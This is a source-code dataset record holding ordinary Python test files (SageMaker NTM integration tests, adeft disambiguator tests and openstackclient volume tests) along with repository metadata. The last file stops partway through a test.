] | 20 | 2021-09-17T20:50:11.000Z | 2021-12-09T00:29:02.000Z | tests/integ/test_ntm.py | satishpasumarthi/sagemaker-python-sdk | 255a339ae985041ef47e3a80da91b9f54bca17b9 | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker import NTM, NTMModel, Predictor
from sagemaker.amazon.common import read_records
from sagemaker.serverless import ServerlessInferenceConfig
from sagemaker.utils import unique_name_from_base
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout, timeout_and_delete_endpoint_by_name
from tests.integ.record_set import prepare_record_set_from_local_files
@pytest.mark.release
@pytest.mark.skip(
reason="This test has always failed, but the failure was masked by a bug. "
"This test should be fixed. Details in https://github.com/aws/sagemaker-python-sdk/pull/968"
)
def test_ntm(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
# all records must be same
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(1, cpu_instance_type, endpoint_name=job_name)
predict_input = np.random.rand(1, feature_num)
result = predictor.predict(predict_input)
assert len(result) == 1
for record in result:
assert record.label["topic_weights"] is not None
def test_ntm_serverless_inference(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm-serverless")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
# all records must be same
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(
serverless_inference_config=ServerlessInferenceConfig(), endpoint_name=job_name
)
assert isinstance(predictor, Predictor)
| 38.394231 | 99 | 0.717506 |
from __future__ import absolute_import
import os
import numpy as np
import pytest
from sagemaker import NTM, NTMModel, Predictor
from sagemaker.amazon.common import read_records
from sagemaker.serverless import ServerlessInferenceConfig
from sagemaker.utils import unique_name_from_base
from tests.integ import DATA_DIR, TRAINING_DEFAULT_TIMEOUT_MINUTES
from tests.integ.timeout import timeout, timeout_and_delete_endpoint_by_name
from tests.integ.record_set import prepare_record_set_from_local_files
@pytest.mark.release
@pytest.mark.skip(
reason="This test has always failed, but the failure was masked by a bug. "
"This test should be fixed. Details in https://github.com/aws/sagemaker-python-sdk/pull/968"
)
def test_ntm(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(1, cpu_instance_type, endpoint_name=job_name)
predict_input = np.random.rand(1, feature_num)
result = predictor.predict(predict_input)
assert len(result) == 1
for record in result:
assert record.label["topic_weights"] is not None
def test_ntm_serverless_inference(sagemaker_session, cpu_instance_type):
job_name = unique_name_from_base("ntm-serverless")
with timeout(minutes=TRAINING_DEFAULT_TIMEOUT_MINUTES):
data_path = os.path.join(DATA_DIR, "ntm")
data_filename = "nips-train_1.pbr"
with open(os.path.join(data_path, data_filename), "rb") as f:
all_records = read_records(f)
feature_num = int(all_records[0].features["values"].float32_tensor.shape[0])
ntm = NTM(
role="SageMakerRole",
instance_count=1,
instance_type=cpu_instance_type,
num_topics=10,
sagemaker_session=sagemaker_session,
)
record_set = prepare_record_set_from_local_files(
data_path, ntm.data_location, len(all_records), feature_num, sagemaker_session
)
ntm.fit(records=record_set, job_name=job_name)
with timeout_and_delete_endpoint_by_name(job_name, sagemaker_session):
model = NTMModel(ntm.model_data, role="SageMakerRole", sagemaker_session=sagemaker_session)
predictor = model.deploy(
serverless_inference_config=ServerlessInferenceConfig(), endpoint_name=job_name
)
assert isinstance(predictor, Predictor)
| true | true |
f7326090f8bedc0b5a1973fcdc6eeb702c6723dc | 4,197 | py | Python | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | adeft/tests/test_disambiguate.py | johnbachman/deft | 3643dd33ba4cb548f7622f24a3b87fbe48e38050 | [
"BSD-2-Clause"
] | null | null | null | import os
import uuid
import json
import shutil
import logging
from nose.tools import raises
from numpy import array_equal
from adeft.modeling.classify import load_model
from adeft.locations import TEST_RESOURCES_PATH
from adeft.disambiguate import AdeftDisambiguator, load_disambiguator
logger = logging.getLogger(__name__)
# Get test model path so we can write a temporary file here
TEST_MODEL_PATH = os.path.join(TEST_RESOURCES_PATH, 'test_model')
# Path to scratch directory to write files to during tests
SCRATCH_PATH = os.path.join(TEST_RESOURCES_PATH, 'scratch')
example1 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors')
example2 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors. Insulin resistance (IR)'
' is considered as a pathological condition in which cells fail'
' to respond normally to the hormone insulin')
example3 = ('IR is a transmembrane receptor that is activated by insulin,'
' IGF-1, IFG-II and belongs to the large class of tyrosine'
' kinase receptors')
def test_load_disambiguator():
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
assert ad.shortforms == ['IR']
assert hasattr(ad, 'classifier')
assert hasattr(ad, 'recognizers')
def test_dump_disambiguator():
ad1 = load_disambiguator('IR', path=TEST_MODEL_PATH)
tempname = uuid.uuid4().hex
ad1.dump(tempname, path=SCRATCH_PATH)
ad2 = load_disambiguator('IR', path=SCRATCH_PATH)
assert ad1.grounding_dict == ad2.grounding_dict
assert ad1.names == ad2.names
assert ad1.pos_labels == ad2.pos_labels
assert (array_equal(ad1.classifier.estimator.named_steps['logit'].coef_,
ad2.classifier.estimator.named_steps['logit'].coef_))
assert ad1.info() == ad2.info(), (ad1.info(), ad2.info())
try:
shutil.rmtree(os.path.join(SCRATCH_PATH, tempname))
except Exception:
logger.warning('Could not clean up temporary folder %s'
% os.path.join(SCRATCH_PATH, tempname))
def test_disambiguate():
test_model = load_model(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_model.gz'))
with open(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_grounding_dict.json')) as f:
grounding_dict = json.load(f)
with open(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_names.json')) as f:
names = json.load(f)
ad = AdeftDisambiguator(test_model, grounding_dict, names)
# case where there is a unique defining pattern
disamb1 = ad.disambiguate(example1)
assert disamb1[0] == 'HGNC:6091'
assert disamb1[1] == 'INSR'
assert disamb1[2]['HGNC:6091'] == 1.0
assert disamb1[2]['MESH:D011839'] == 0.0
# case where there are conflicting defining patterns
disamb2 = ad.disambiguate(example2)
preds = disamb2[2]
nonzero = {key for key, value in preds.items() if value > 0.0}
assert nonzero == {'HGNC:6091', 'MESH:D007333'}
# case without a defining pattern
disamb3 = ad.disambiguate(example3)
assert disamb3[0] == 'HGNC:6091'
assert disamb3[1] == 'INSR'
def test_modify_groundings():
"""Test updating groundings of existing model."""
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
ad.modify_groundings(new_groundings={'HGNC:6091': 'UP:P06213'},
new_names={'HGNC:6091': 'Insulin Receptor'})
assert 'UP:P06213' in ad.pos_labels
assert 'UP:P06213' in ad.classifier.pos_labels
assert 'UP:P06213' in ad.classifier.estimator.classes_
assert 'UP:P06213' in ad.names
assert 'UP:P06213' in ad.grounding_dict['IR'].values()
assert ad.names['UP:P06213'] == 'Insulin Receptor'
@raises(ValueError)
def test_modify_groundings_error():
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
ad.modify_groundings(new_groundings={'MESH:D011839': 'HGNC:6091'})
| 38.154545 | 78 | 0.679295 | import os
import uuid
import json
import shutil
import logging
from nose.tools import raises
from numpy import array_equal
from adeft.modeling.classify import load_model
from adeft.locations import TEST_RESOURCES_PATH
from adeft.disambiguate import AdeftDisambiguator, load_disambiguator
logger = logging.getLogger(__name__)
TEST_MODEL_PATH = os.path.join(TEST_RESOURCES_PATH, 'test_model')
SCRATCH_PATH = os.path.join(TEST_RESOURCES_PATH, 'scratch')
example1 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors')
example2 = ('The insulin receptor (IR) is a transmembrane receptor that'
' is activated by insulin, IGF-I, IGF-II and belongs to the large'
' class of tyrosine kinase receptors. Insulin resistance (IR)'
' is considered as a pathological condition in which cells fail'
' to respond normally to the hormone insulin')
example3 = ('IR is a transmembrane receptor that is activated by insulin,'
' IGF-1, IFG-II and belongs to the large class of tyrosine'
' kinase receptors')
def test_load_disambiguator():
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
assert ad.shortforms == ['IR']
assert hasattr(ad, 'classifier')
assert hasattr(ad, 'recognizers')
def test_dump_disambiguator():
ad1 = load_disambiguator('IR', path=TEST_MODEL_PATH)
tempname = uuid.uuid4().hex
ad1.dump(tempname, path=SCRATCH_PATH)
ad2 = load_disambiguator('IR', path=SCRATCH_PATH)
assert ad1.grounding_dict == ad2.grounding_dict
assert ad1.names == ad2.names
assert ad1.pos_labels == ad2.pos_labels
assert (array_equal(ad1.classifier.estimator.named_steps['logit'].coef_,
ad2.classifier.estimator.named_steps['logit'].coef_))
assert ad1.info() == ad2.info(), (ad1.info(), ad2.info())
try:
shutil.rmtree(os.path.join(SCRATCH_PATH, tempname))
except Exception:
logger.warning('Could not clean up temporary folder %s'
% os.path.join(SCRATCH_PATH, tempname))
def test_disambiguate():
test_model = load_model(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_model.gz'))
with open(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_grounding_dict.json')) as f:
grounding_dict = json.load(f)
with open(os.path.join(TEST_MODEL_PATH, 'IR',
'IR_names.json')) as f:
names = json.load(f)
ad = AdeftDisambiguator(test_model, grounding_dict, names)
disamb1 = ad.disambiguate(example1)
assert disamb1[0] == 'HGNC:6091'
assert disamb1[1] == 'INSR'
assert disamb1[2]['HGNC:6091'] == 1.0
assert disamb1[2]['MESH:D011839'] == 0.0
disamb2 = ad.disambiguate(example2)
preds = disamb2[2]
nonzero = {key for key, value in preds.items() if value > 0.0}
assert nonzero == {'HGNC:6091', 'MESH:D007333'}
disamb3 = ad.disambiguate(example3)
assert disamb3[0] == 'HGNC:6091'
assert disamb3[1] == 'INSR'
def test_modify_groundings():
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
ad.modify_groundings(new_groundings={'HGNC:6091': 'UP:P06213'},
new_names={'HGNC:6091': 'Insulin Receptor'})
assert 'UP:P06213' in ad.pos_labels
assert 'UP:P06213' in ad.classifier.pos_labels
assert 'UP:P06213' in ad.classifier.estimator.classes_
assert 'UP:P06213' in ad.names
assert 'UP:P06213' in ad.grounding_dict['IR'].values()
assert ad.names['UP:P06213'] == 'Insulin Receptor'
@raises(ValueError)
def test_modify_groundings_error():
ad = load_disambiguator('IR', path=TEST_MODEL_PATH)
ad.modify_groundings(new_groundings={'MESH:D011839': 'HGNC:6091'})
| true | true |
f73260e91d1ae454fee4867788ff917e7a7743be | 22,733 | py | Python | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
] | null | null | null | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
] | null | null | null | python/venv/lib/python2.7/site-packages/openstackclient/tests/volume/v1/test_volume.py | sjsucohort6/openstack | 8471e6e599c3f52319926a582358358ef84cbadb | [
"MIT"
] | null | null | null | # Copyright 2013 Nebula Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
from openstackclient.tests import fakes
from openstackclient.tests.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.volume.v1 import fakes as volume_fakes
from openstackclient.volume.v1 import volume
class TestVolume(volume_fakes.TestVolumev1):
def setUp(self):
super(TestVolume, self).setUp()
# Get a shortcut to the VolumeManager Mock
self.volumes_mock = self.app.client_manager.volume.volumes
self.volumes_mock.reset_mock()
# Get a shortcut to the TenantManager Mock
self.projects_mock = self.app.client_manager.identity.tenants
self.projects_mock.reset_mock()
# Get a shortcut to the UserManager Mock
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
# Get a shortcut to the ImageManager Mock
self.images_mock = self.app.client_manager.image.images
self.images_mock.reset_mock()
# TODO(dtroyer): The volume create tests are incomplete, only the minimal
# options and the options that require additional processing
# are implemented at this time.
class TestVolumeCreate(TestVolume):
def setUp(self):
super(TestVolumeCreate, self).setUp()
self.volumes_mock.create.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
# Get the command object to test
self.cmd = volume.CreateVolume(self.app, None)
def test_volume_create_min_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
'--description', volume_fakes.volume_description,
'--type', volume_fakes.volume_type,
'--availability-zone', volume_fakes.volume_zone,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('description', volume_fakes.volume_description),
('type', volume_fakes.volume_type),
('availability_zone', volume_fakes.volume_zone),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
volume_fakes.volume_description,
volume_fakes.volume_type,
None,
None,
volume_fakes.volume_zone,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_id(self):
# Return a project
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
# Return a user
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_id,
'--user', identity_fakes.user_id,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_id),
('user', identity_fakes.user_id),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_user_project_name(self):
# Return a project
self.projects_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.PROJECT),
loaded=True,
)
# Return a user
self.users_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(identity_fakes.USER),
loaded=True,
)
arglist = [
'--size', str(volume_fakes.volume_size),
'--project', identity_fakes.project_name,
'--user', identity_fakes.user_name,
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('project', identity_fakes.project_name),
('user', identity_fakes.user_name),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
identity_fakes.user_id,
identity_fakes.project_id,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_properties(self):
arglist = [
'--property', 'Alpha=a',
'--property', 'Beta=b',
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('property', {'Alpha': 'a', 'Beta': 'b'}),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
{'Alpha': 'a', 'Beta': 'b'},
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_id(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_id,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_id),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_image_name(self):
self.images_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.IMAGE),
loaded=True,
)
arglist = [
'--image', volume_fakes.image_name,
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('image', volume_fakes.image_name),
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
columns, data = self.cmd.take_action(parsed_args)
# VolumeManager.create(size, snapshot_id=, source_volid=,
# display_name=, display_description=,
# volume_type=, user_id=,
# project_id=, availability_zone=,
# metadata=, imageRef=)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
volume_fakes.image_id,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
class TestVolumeSet(TestVolume):
def setUp(self):
super(TestVolumeSet, self).setUp()
self.volumes_mock.get.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.volumes_mock.update.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
# Get the command object to test
self.cmd = volume.SetVolume(self.app, None)
def test_volume_set_no_options(self):
arglist = [
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("No changes requested\n",
self.app.log.messages.get('error'))
def test_volume_set_name(self):
arglist = [
'--name', 'qwerty',
volume_fakes.volume_name,
]
verifylist = [
('name', 'qwerty'),
('description', None),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'display_name': 'qwerty',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_description(self):
arglist = [
'--description', 'new desc',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', 'new desc'),
('size', None),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
kwargs = {
'display_description': 'new desc',
}
self.volumes_mock.update.assert_called_with(
volume_fakes.volume_id,
**kwargs
)
def test_volume_set_size(self):
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
size = 130
self.volumes_mock.extend.assert_called_with(
volume_fakes.volume_id,
size
)
def test_volume_set_size_smaller(self):
arglist = [
'--size', '100',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 100),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("New size must be greater than %s GB" %
volume_fakes.volume_size,
self.app.log.messages.get('error'))
def test_volume_set_size_not_available(self):
self.volumes_mock.get.return_value.status = 'error'
arglist = [
'--size', '130',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', 130),
('property', None),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
result = self.cmd.run(parsed_args)
self.assertEqual(0, result)
self.assertEqual("Volume is in %s state, it must be available before "
"size can be extended" % 'error',
self.app.log.messages.get('error'))
def test_volume_set_property(self):
arglist = [
'--property', 'myprop=myvalue',
volume_fakes.volume_name,
]
verifylist = [
('name', None),
('description', None),
('size', None),
('property', {'myprop': 'myvalue'}),
('volume', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
# DisplayCommandBase.take_action() returns two tuples
self.cmd.take_action(parsed_args)
# Set expected values
metadata = {
'myprop': 'myvalue'
}
self.volumes_mock.set_metadata.assert_called_with(
volume_fakes.volume_id,
metadata
)
| 32.01831 | 78 | 0.5397 |
import copy
from openstackclient.tests import fakes
from openstackclient.tests.identity.v2_0 import fakes as identity_fakes
from openstackclient.tests.volume.v1 import fakes as volume_fakes
from openstackclient.volume.v1 import volume
class TestVolume(volume_fakes.TestVolumev1):
def setUp(self):
super(TestVolume, self).setUp()
self.volumes_mock = self.app.client_manager.volume.volumes
self.volumes_mock.reset_mock()
self.projects_mock = self.app.client_manager.identity.tenants
self.projects_mock.reset_mock()
self.users_mock = self.app.client_manager.identity.users
self.users_mock.reset_mock()
self.images_mock = self.app.client_manager.image.images
self.images_mock.reset_mock()
class TestVolumeCreate(TestVolume):
def setUp(self):
super(TestVolumeCreate, self).setUp()
self.volumes_mock.create.return_value = fakes.FakeResource(
None,
copy.deepcopy(volume_fakes.VOLUME),
loaded=True,
)
self.cmd = volume.CreateVolume(self.app, None)
def test_volume_create_min_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
volume_fakes.volume_name,
]
verifylist = [
('size', volume_fakes.volume_size),
('name', volume_fakes.volume_name),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.volumes_mock.create.assert_called_with(
volume_fakes.volume_size,
None,
None,
volume_fakes.volume_name,
None,
None,
None,
None,
None,
None,
None,
)
collist = (
'attach_status',
'availability_zone',
'display_description',
'display_name',
'id',
'properties',
'size',
'status',
'type',
)
self.assertEqual(collist, columns)
datalist = (
'detached',
volume_fakes.volume_zone,
volume_fakes.volume_description,
volume_fakes.volume_name,
volume_fakes.volume_id,
volume_fakes.volume_metadata_str,
volume_fakes.volume_size,
volume_fakes.volume_status,
volume_fakes.volume_type,
)
self.assertEqual(datalist, data)
def test_volume_create_options(self):
arglist = [
'--size', str(volume_fakes.volume_size),
